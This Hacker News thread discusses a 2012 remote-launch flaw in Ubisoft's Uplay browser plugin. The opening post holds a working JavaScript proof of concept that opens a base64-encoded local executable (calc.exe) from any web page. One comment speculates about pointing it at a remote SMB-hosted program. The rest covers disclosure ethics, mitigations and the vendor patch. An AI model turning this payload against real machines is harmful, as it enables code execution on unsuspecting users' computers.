
Ubisoft "Uplay" DRM exposed as rootkit - rightclick
If you play one of the games below try clicking on this link (tested with Assassin's Creed on Win7 and FireFox).<p>http://pastehtml.com/view/c6gxl1a79.html<p><pre><code>  var x = document.createElement('OBJECT');
  
  x.setAttribute("type", "application/x-uplaypc");
  document.body.appendChild(x);
  x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
</code></pre>
Ubisoft installs a backdoor that allows any website to take over your computer. The Sony BMG rootkit was also DRM and required product recall when it was discovered.<p>http://en.wikipedia.org/wiki/Ubisoft#Games<p><pre><code>    Assassin's Creed II
    Assassin's Creed: Brotherhood
    Assassin's Creed: Project Legacy
    Assassin's Creed Revelations
    Assassin's Creed III
    Beowulf: The Game
    Brothers in Arms: Furious 4
    Call of Juarez: The Cartel
    Driver: San Francisco
    Heroes of Might and Magic VI
    Just Dance 3
    Prince of Persia: The Forgotten Sands
    Pure Football
    R.U.S.E.
    Shaun White Skateboarding
    Silent Hunter 5: Battle of the Atlantic
    The Settlers 7: Paths to a Kingdom
    Tom Clancy's H.A.W.X. 2
    Tom Clancy's Ghost Recon: Future Soldier
    Tom Clancy's Splinter Cell: Conviction
    Your Shape: Fitness Evolved</code></pre>
======
Foy
Oh hell no. I can't believe this shit... and Tom Clancy's Ghost Recon: Future
Soldier was such a good game too. T_T

Next time I want to play an Ubisoft game I'm just going to pirate it.

EDIT: I buy 99% of my video games through Steam, and when the games I get
through Steam want to use their own launcher (play, windows live games, or
EA's Origin, for example) I always get peeved.. to find out it allows
arbitrary remote code execution is absolutely infuriating.

EDIT: Oh, btw, I'm using Opera 12.

EDIT: Protect yourself (in Opera, at least) by going to Settings ->
Preferences(menu option) -> Advanced(Tab) -> Downloads(left menu bar) ->
Search for "uplay" and delete the associated row.

~~~
jiggy2011
I hate the hoop jumping in modern games. I was playing Street Fighter 4
recently and it comes up with "oh, you want to save your single player game?
You have to create a MicrosoftWindowsBingGamesPhone8ForXboxLive.Net account" .

Then of course you have to wait for the damn thing to sign in every time you
want to play the game "Connection failed, do you want to retry?"

~~~
Foy
Short of doing extensive background research on a title, Steam has no
indication of a game's dependence on some third party launcher or cloud
service, so every time I run a new game for the first time I have to clench
and pray the Windows Live overlay doesn't drop down.

Meaning: I feel your pain, brother.

~~~
wlesieutre
You sure about that? Section 8: Prejudice [1] (the only GFWL game I own) lists
Games for Windows Live under 3rd party DRM.

On the other hand, the Batman: Arkham Noun games [2,3] list SecuROM in 3rd
party DRM but not GFWL. I'm told that these games are both GFWL titles.

I don't know what's going on there, but it looks inconsistent.

[1] <http://store.steampowered.com/app/97100/>

[2] <http://store.steampowered.com/app/35140/>

[3] <http://store.steampowered.com/app/57400/>

~~~
jiggy2011
Batman: Arkham Asylum requires a Windows Live account, not sure about the new
one.

Perhaps it is not listed if it is only used to enable "social gaming" but DRM
is done by some other software.

~~~
wlesieutre
Just spotted it, the Batman games hide it in the System requirements:

> Online play requires log-in to Games For Windows – Live

So I guess it's in the DRM list if you need it to play singleplayer, and in
system reqs if you don't. Seems fair, but I'd still rather have it be
consistent. No reason S8 couldn't list it in both spots.

~~~
Foy
Still, I habitually don't read System Reqs. I'd expect something more like one
of the "Single Player", "Multi Player" bullets under the ESRB rating.
"Requires 3rd party bullshit"

~~~
wlesieutre
Agreed. There's no game that my desktop doesn't meet the minimum requirements
for, and won't be for at least a few years. I don't make a habit of checking
them.

------
pilif
I wouldn't say that this is a rootkit (there's no kernel-based magic or even
just privilege elevation going on), nor that this was done with bad
intentions.

This is just inexperienced developers («it's "encrypted" using base64 - we're
fine!!») that had a "great idea" (= launch games from an embedded IE control)
that has, kinda, backfired.

The sad thing is that it would be _trivial_ (I'm using the word "trivial" here
are I have implemented something like this just last friday in 3 hours) to add
a signature to that command line and only execute signed command lines - I
mean, these Games require an internet connection anyways, so there's nothing
stopping them from serving the launcher from somewhere in the web and have a
private key there to do the signing.

~~~
Zolomon
Just for your information; rootkits can exist in any of the rings[1]. However,
kernel-mode rootkits are most often harder to detect and get rid off. There
are several definitions of a rootkit, a common definition is "software
designed to hide the existence of certain processes or programs from normal
methods of detection and enable continued privileged access to a computer."[2]

[1] <http://en.wikipedia.org/wiki/Ring_(computer_security)> [2]
<http://en.wikipedia.org/wiki/Rootkit>

~~~
wlesieutre
It doesn't seem like they went to any particular lengths to hide it, just
nobody bothered to look very hard, and you wouldn't expect them to be
installing browser plugins. Sony's DRM system, on the other hand, was an
actual rootkit and went to a lot of effort to bury itself in the infected
system.

~~~
Natsu
Maybe people would prefer to call it a "backdoor" instead, but this is quite
disconcerting. I'm very glad I don't play any of those games.

------
kinetik
Original source: <http://seclists.org/fulldisclosure/2012/Jul/375>

~~~
ajasmin
One of these day I'll have to buy an IDA license. I keep seeing amazing uses
of that disassembler.

~~~
sometwo
You can begin with the freeware version.

------
kevingadd
Why does Tavis Ormandy (<http://seclists.org/fulldisclosure/2012/Jul/375>)
keep putting fully usable proof of concept exploits out for widely deployed
software without giving a vendor time to prepare a patch, or in this case,
even notifying them? Off the top of my head, I remember he did this for the
windows help center exploit and the java web start exploit. I can't understand
why you would do this. You could at least give the vendor a couple weeks, and
then if you're super worried, release the details as soon as an exploit is
found in the wild.

As-is, he just seems like a raging hacker who loves attention and doesn't care
if thousands of unsuspecting users get their credit card details stolen by
malware authors. I must be misunderstanding something, yeah?

~~~
Paul_S
Because the company wasn't acting in good faith? IMHO they put that there on
purpose and they deserve to be exposed as evil bastards that they are.

~~~
simias
Do you have any evidence they put that here on purpose or are you just
spreading rumors? It could as well be shoddy programming.

~~~
Paul_S
I don't subscribe to "never attribute to malice that which is adequately
explained by stupidity". I'm not citing sources - hence it's just my opinion.
Reminds me of google wifi slurping and hundreds of other cases where everyone
plays dumb and swears it was all a misunderstanding. It never is. Until you
get caught. And if not that it's a rogue trader, rogue reporter, rogue
programmer, rogue scapegoat.

~~~
jbrechtel
Since we have no additional evidence to select between the two options, do you
really think that malice is simpler than stupidity?

~~~
Paul_S
I'm not going to do any kind of full disclosure here (I know this is lame) but
I work in video games so I know what it looks like from the other side. We're
not all idiots here, we just do as we're told.

~~~
danudey
As a Vancouverite, I've seen enough layoffs to believe this entirely (you're
fungible and replaceable). Still, I don't think that Ubisoft intentionally
created a security issue, just that they didn't care about one that happened
and deadlines were coming.

------
fmavituna
Google chrome users: You can go to "about:plugins" and disable this and all
other things that might expose you to extra security risks such as "Microsoft
Office" (even "Native Client") or any other plugins that exposed in there by
3rd party without any confirmation.

------
vyrotek
I think they just fixed this. It opened Uplay and it instantly downloaded a
new update released today.

Version 2.0.4 - Monday July 30th 2012 - "Fix addressing browser plugin. Plugin
now only able to open Uplay application"

~~~
MichaelGG
I would love to see how they patched it. Seems folks like these might
implement a check like 'cmd.Contains("uplay.exe")' and let you do
"C:\whatever\uplay.exe\\..\\..\bad.exe".

------
simias
I'm not sure if that's what the OP implied, but I'm not sure this was done on
purpose. "Never attribute to malice that which is adequately explained by
stupidity". Ubisoft is well know for their aggressive anti-pirating practices
(cloud saves for instance), but that's just too idiotic.

Here's taviso's mail on seclists:
<http://seclists.org/fulldisclosure/2012/Jul/375>

I hope ubisoft reacts quickly.

~~~
aristidb
If they can't do a crippling DRM properly, then maybe they have no business
building one at all.

------
sargun
This is concerning. Does anyone have any links to comments by Ubisoft? Any
reason why they would need the ability to execute arbitrary code in a hidden
manner? From what I understand, we call these things Trojans...

------
cabirum
UBI is not alone doing this.

Battlefield 3 also installs it's plugin ("ESN Launch Mozilla Plugin") in all
browsers on a pc. It's capable of running EA's Origin service, so does it
present the same threat?

~~~
drucken
Also, game publisher Nexon silently installs a browser plugin (Nexon Game
Controller) on many (all?) of its games, none of which AFAIK need a browser:

Vindictus/Mabinogi Heroes

Dragon Nest

Maplestory

Atlantica Online

Combat Arms

------
atrius
I have several of these games (SWS, PoP, Heroes MM VI) installed as well as
UPlay but do not have any file associations for the type listed. Nor is
"x-uplaypc" anywhere in the registry for the Windows shell.

I also have titles that use online login from Ubi such as ANNO 2070 installed.

I think the list of affected titles is far smaller than listed.

How and when is this associate set? Has someone identified which application
in the installer performs it? Is it a particular UPlay version?

I don't doubt they are setting this up to allow them to run games from a
browser. EA does it with Origin, Valve does it with Steam, as well as numerous
other applications.

I don't doubt its existence but I think people are starting a wildfire without
enough facts. I can't even seem to research this because it's not on my
machine.

------
jeremysalwen
Confirmed that this works on Win7/Firefox/Prince of Persia.

------
mikeymeows
Wow, well I already knew ubisoft were fisting me, but two hands? cmon.

~~~
rmc
Oh please, I know you're being light hearted, and repeating common cultual
memes, but please keep the "recieving anal is submission" to your self. It's
often used as an excuse to call gay men "not real men" or effeminit. People
(of all genders & sexualities) who like fisting are not evil either.

~~~
bbrtyth
And should we also stop saying we've gotten "fucked" for similar reasons?
Since you are the curator and sole arbiter of allowable phrases, I'd like to
get it all clear while I've got your ear.

~~~
rmc
_And should we also stop saying we've gotten "fucked" for similar reasons?_

Sorta. Tis roughly the similar overtones of 'people-who-take-it-are-bad' (i.e.
everyone who isn't a straight cis male), however it's not as graphic and not
as tied to the actual imagery of receptive sex as the previous example.

 _Since you are the curator and sole arbiter of allowable phrases_

What? No I'm not. Who said I was? Not me. Just because I call someone on
something doesn't mean I'm the sole arbiter of things. How many articles on
this site will lambaste some technology? Lots. Do we reply with "Shut up!
you're not the sole arbiter of programming languages"? No that's not what
happens here. One should talk about the merits of the complaint, rather than
try some little deflection tactic.

~~~
bbrtyth
What about usage of the word "use"? Surely that implies interacting with
another person only for sex and we should stop using it lest we offend.

I was not deflecting, that was my way of talking about the merits of the
complaint, to whit, what you object to might be a tiny subset of someone
else's objections, in which case who gets to decide? By telling that person
not to use that terminology, you are saying you get to decide.

I think we've also seen plenty of people who think they are the sole arbiter
of programming languages, and they get called out on it.

~~~
rmc
_What about usage of the word "use"? Surely that implies interacting with
another person only for sex_

No, the word "use" means lots of things. To give you an idea, lots of people
are OK with people saying "use" in polite, professional contexts, or day time
TV, but lots of people would not be OK with "fuck" or "fisting with two hands"
in professional contexts. There is a difference between them. If you cannot
tell the difference, people might get annoyed at you in many situations.

 _we should stop using it lest we offend_

It is a common retort from people who want to continue to say things that
marginalise some minorities to claim that "It's polticial correctness gone
mad!" or "you can't say anything anymore!". You've just done that, you're
trying to imply that I would have a problem with the word "use" to further
your strawman argument that "You can't say anything anymore lest you offend!".
No-one's suggesting that there's anything wrong with "use". But there is
something wrong with calling anyone who anal bad, or anyone who might engage
in receptive sex (i.e. all non-straight-cis-males) bad.

~~~
bbrtyth
I'm not trying to imply you have a problem with the word "use", I am directly
implying that there is some boundary beyond which someone will be offended and
you will not be. At which point whose delicate sensibilities should we defer
to?

I, for one, take exception that your category of people who enjoy receptive
sex seems to be explicitly excluding straight males, such that you've used the
exact same "i.e." qualifier twice. It is well within the realm of possibility
that a straight male would ask his partner to stimulate his prostate during
sex, but you categorically reject that. Are you going to correct your mistake
and stop making generalizations? Maybe start using e.g. from now on?

My position is this; it is obvious that the original poster is not making some
kind of blanket statement that all people who participate in anal sex are bad,
but rather is stating that having a large object in your anus is uncomfortable
and having an entity do it to you while you are unwilling is horrible. It's
not a statement that was attempting to marginalize minority groups. _You_ are
the one who misconstrued it to mean all gay men are evil. Maybe that's why you
find people's objections to your attempted control over the English language
to be common.

Finally, you seem to be annoyed that I "created a strawman argument" out of
you, but you do feel free to contort my statements into "it's political
correctness gone mad!", and "you can't say anything anymore!" as well as
directly stating that I am someone who "wants to continue to say things that
marginalize some minorities". Is ad hominem less of a logical fallacy than
making a so-called strawman argument? I'm not going to continue arguing with
someone that has such intellectual dishonesty because it's just a waste of
time. I am done here and I won't be reading any responses you post, so you can
save yourself some time there.

------
res0nat0r
If this was something released by Valve would it be described as a 'rootkit',
or more of a dumb mistake? The internet loves Steam and anything and
everything by Valve and hates Ubisoft.

~~~
slurgfest
By all means, bring out the inept rootkit installed by Steam which creates any
remotely comparable vulnerability in as many PCs.

------
ajasmin
So does this have some legitimate use on the web (such as product activation
on the Ubisoft website) or is this an ActiveX component intended to be used
locally that could have been marked as "safe for scripting" by mistake?

Edit: Other comments suggest there's a NPAPI plugin as well so it's definitely
intended for use on the web.

Also in what sense is this a rootkit? Is this purposely hidden from the list
of IE addons or something?

------
bbrtyth
Because of people like this (the straw was Growl installing itself for the
third time), I've had to completely change the permissions on particularly
vulnerable folders in OS X. Anyone creating software, if you are not already
aware of this: installing anything that is not completely and clearly
explained beforehand makes you a despicable wretch.

~~~
caiusdurling
FWIW growl doesn't install itself, applications that use it are _supposed_ to
offer to install growl for you, but there's been a few that don't and just
force it on you.

The growl devs really really hate those applications -
<http://growl.info/thirdpartyinstallations.php> has more info.

~~~
bbrtyth
The third party applications are using the Growl framework, yes? Did they
write the extra code to install Growl? If so, I am sorry. If, as I suspect,
they did not, why does the Growl framework not ask the user when that method
is invoked?

------
fmavituna
Even though the original vulnerability was quite lame and violated the first
rule of writing an ActiveX plugin (site-locking and making it only available
over HTTPS otherwise it's still vulnerable to code execution via MITM).

It's impressive that they already updated Uplay to address this problem (not
sure whether the fix is actually working or not though).

------
Executor32
Doesn't work for me in either IE or Chrome, and I have AssCreed II, AssBro,
AssRev, and Forgotten Sands all installed. There is also no uPlay plugin to be
found in either browser. I suspect this only applies to certain versions of
uPlay; whether newer or older than the version I have installed, I have no
idea.

------
Aissen
Any mitigation ? Is it possible to disable this browser plugin ?

~~~
obtu
Google and Mozilla will certainly add it to their plugin blacklists. Trojan
capabilities remote-controlled through a browser, that's a very serious
security risk to their users.

~~~
kevingadd
A bug is filed to blacklist it in Firefox:
<https://bugzilla.mozilla.org/show_bug.cgi?id=778686>

------
e_p
This is an simple, obvious and extremely dangerous error, that anyone with
experience or appropriate education would have avoided.

There's an evident frivolous attitude towards technical quality control
present here, and everyone should avoid installing games requiring uPlay for
the time being.

------
ferongr
Hows does it work on Firefox? Does Ubisoft install an NPAPI plugin for
browsers without ActiveX?

------
ac-x
Ok, looks like the game can execute an existing exe file already on the
machine, is there currently any proof of concept for actually downloading and
executing arbitrary code? Or even specifying commandline arguments for the exe
file?

------
rogerbraun
This does not 'install a backdoor that allows any website to take over your
computer', right? It just makes it possible to launch any previously installed
executable if you know the path.

~~~
aw3c2
If someone can launch any executables on your machine, you can consider it to
be fairly dangerous.

~~~
rogerbraun
I know, but that's not what the submissions says. It feels a bit
sensationalized.

------
paddington
I'm curious, could it be possible to implement a simple SMB listener in
javascript and then send send "\\\<my-ip-address>\my_virus.exe\" (encoded in
base64) as orbit_exe_path?

~~~
rix0r
You'd have to implement a TCP server listening on a privileged port (< 1024).
Surely no browser would allow this.

~~~
simias
I'm not sure about windows, but on all the un*xes I know you need to be root
(or have the right capabilities) to create a port with number < 1024\. So even
if the browser doesn't enforce this, the OS should.

------
alexanderpas
Add Anno 2070 to the list

~~~
vacri
I've played Anno 2070. It's been removed from my list.

------
duked
How is this a rootkit when the user installed it and got notified of a plugin
browser installed ? Strange behavior yes but no rootkit !

------
Macha
[http://forums.ubi.com/showthread.php/699940-Uplay-PC-
Patch-2...](http://forums.ubi.com/showthread.php/699940-Uplay-PC-
Patch-2-0-4-Security-fix)

Apparently they've patched this now, according to their twitter.

------
Lockyy
I have uplay installed on my games pc along with all available AC games.
Neither chrome nor firefox have this plugin installed. Auto-removed after
being blacklisted? Or never installed?

------
andy_herbert
It might give an extra layer of protection if a browser actually bothered to
ask the user if they wanted to enable the plugin if they didn't explicitly ask
to install it themselves.

------
mansoor-s
Couldn't get it to work with R.U.S.E win7 Firefox/Chrome/IE

------
blitzcraig
Is this a Windows only exploit? I have RUSE installed via Steam on a Macbook
Pro and the linked page reports a missing plugin in Chrome, Safari, and
Firefox.

------
charonn0
Not owning any Ubisoft titles and not really interested in opening up IE, can
someone explain what it is that Ubisoft/IE users are seeing?

------
pjmlp
That is why I stopped buying DRM enabled games.

It is better to live without having played these games, than to expose myself
to such security risks.

------
RwYeAsNt
I don't get it. What does the link do? It opens Uplay for me and starts an
update. What does that mean?

------
cbsmith
Just because it is a security hole, doesn't make it a root kit. This is just a
dumb security hole.

------
fjawodfc
"Ubisoft Uplay DRM exposed as rootkit; dozens of popular games hacked"?
Idiots.

------
elmindreda
Thank you for expanding the list of games I should never buy.

------
freddealmeida
Stunning.

------
pluc
This was fixed this morning. No need to go ballistic over it. It's not a
rootkit.

------
89a
So much for the "Master Race"

